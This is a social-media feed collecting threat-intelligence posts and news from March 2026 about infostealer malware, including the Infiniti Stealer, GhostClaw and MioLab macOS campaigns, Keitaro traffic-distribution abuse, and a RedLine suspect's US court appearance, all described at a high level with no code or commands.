The New OilSuspected #RedLine #infostealer #malware admin extradited to US
OTX BotInfiniti Stealer: a new macOS infostealer using ClickFix and Python/Nuitka
A new macOS infostealer called Infiniti Stealer has been discovered, utilizing ClickFix delivery and Python/Nuitka compilation. The malware spreads through a fake CAPTCHA page, tricking users into running a command themselves. The final payload is a Python-based stealer compiled with Nuitka, making it harder to analyze and detect. The malware targets sensitive data including browser credentials, macOS Keychain entries, cryptocurrency wallets, and developer files. It employs anti-analysis techniques and exfiltrates data via HTTP POST requests. This campaign demonstrates the adaptation of Windows-based techniques to target Mac users and showcases the increasing sophistication of macOS malware.
Pulse ID: 69c65110c392e209625c97d5
Pulse Link: https://otx.alienvault.com/pulse/69c65110c392e209625c97d5
Pulse Author: AlienVault
Created: 2026-03-27 09:42:40
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #CAPTCHA #CyberSecurity #HTTP #InfoSec #InfoStealer #Mac #MacOS #Malware #OTX #OpenThreatExchange #Python #RAT #Windows #bot #cryptocurrency #AlienVault
New #TorgGrabber #infostealer #malware targets 728 #crypto wallets
Infoblox Threat IntelWe planned one report on Keitaro abuse, but we ran out of pages before we ran out of cases.
So here’s Part 2 of 3, a medley of threats that go well beyond AI‑investment scams.
Threat actors abuse Keitaro’s traffic distribution, cloaking, and rule engine to hide malicious landing pages behind geo and device-based filters. They stack bulletproof hosting and reverse proxies to add layers of indirection, making takedown and analysis harder. In this post, we share how we overcame this using multi‑protocol, multi‑vantage telemetry. We leveraged JA4+ web server fingerprints, DNS analytics, and Confiant’s visibility into advertising supply chain data to uncover Keitaro abuse and the delivery of malware downloaders, infostealers, weaponized RMMs, wallet drainer campaigns, scams, and email spam and advertising attack vectors.
If you hunt threats distributed via adtech, these indicators can be useful pivots. https://www.infoblox.com/blog/threat-intelligence/no-reach-no-risk-the-keitaro-abuse-in-modern-cybercrime-distribution/
#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #ai #keitaro #adtech #tds #trafficdistributionsystem #cloaker #cloaking #landscape #malvertising #infostealer #rmm #remotemonitoringmanagement #downloader #malware #spam #airdrop #cryptocurrency #ja4 #ja4_fingerprinting
小津 OzuIf you want a stealer all you need to do is asking nicely.
CyberVeille.ch📢 Un ressortissant arménien présenté devant un tribunal américain pour le malware RedLine Infostealer
📝 ## 🏛️ Contexte
Source : The Cyber Express — Publication le 26 mars 2026.
📖 cyberveille : https://cyberveille.ch/posts/2026-03-26-un-ressortissant-armenien-presente-devant-un-tribunal-americain-pour-le-malware-redline-infostealer/
🌐 source : https://thecyberexpress.com/redline-infostealer-networks-second-defendant/
#Infostealer #RedLine #Cyberveille
Un ressortissant arménien présenté devant un tribunal américain pour le malware RedLine Infostealer
🏛️ Contexte Source : The Cyber Express — Publication le 26 mars 2026. L’article rapporte la comparution devant un tribunal américain à Austin (Texas) d’un ressortissant arménien impliqué dans une campagne liée au RedLine Infostealer. 👤 Suspect Nationalité : Arménienne Lieu de comparution : Tribunal d’Austin, Texas (États-Unis) Rôle : Opérateur ou participant à une campagne RedLine Infostealer Il s’agit d’un second défendeur dans cette affaire (mentionné dans l’URL de l’article) 🦠 Malware concerné RedLine Infostealer : logiciel malveillant de type stealer, connu pour dérober des identifiants, données de navigateurs, portefeuilles de cryptomonnaies et autres informations sensibles sur les systèmes infectés. 📰 Nature de l’article Article de presse spécialisée relatant une opération judiciaire américaine visant un opérateur présumé du réseau RedLine Infostealer. Le but principal est d’informer sur les poursuites judiciaires engagées contre un acteur impliqué dans la distribution ou l’opération de ce malware.
Hackread.comPXA Stealer attacks are rising, with researchers reporting a 10% spike targeting financial firms. The malware uses phishing and Telegram to steal credentials and crypto data.
Read: https://hackread.com/financial-firms-rise-pxa-stealer-attacks/
#Trivy vulnerability scanner breach pushed #infostealer via #GitHub Actions
GhostClaw expands beyond npm: GitHub repositories and AI workflows deliver macOS infostealer
Pulse ID: 69c1bf4a476f34783a7c6937
Pulse Link: https://otx.alienvault.com/pulse/69c1bf4a476f34783a7c6937
Pulse Author: Tr1sa111
Created: 2026-03-23 22:31:38
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #GitHub #InfoSec #InfoStealer #Mac #MacOS #NPM #OTX #OpenThreatExchange #bot #Tr1sa111
Sophisticated macOS Infostealer known as MioLab
MioLab, also known as Nova, has surfaced as a highly sophisticated Malware-as-a-Service (MaaS) platform specifically targeting Apple users.
Pulse ID: 69c1af72ec1c62238c869b68
Pulse Link: https://otx.alienvault.com/pulse/69c1af72ec1c62238c869b68
Pulse Author: cryptocti
Created: 2026-03-23 21:24:02
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #InfoSec #InfoStealer #MaaS #Mac #MacOS #Malware #MalwareAsAService #OTX #OpenThreatExchange #bot #cryptocti
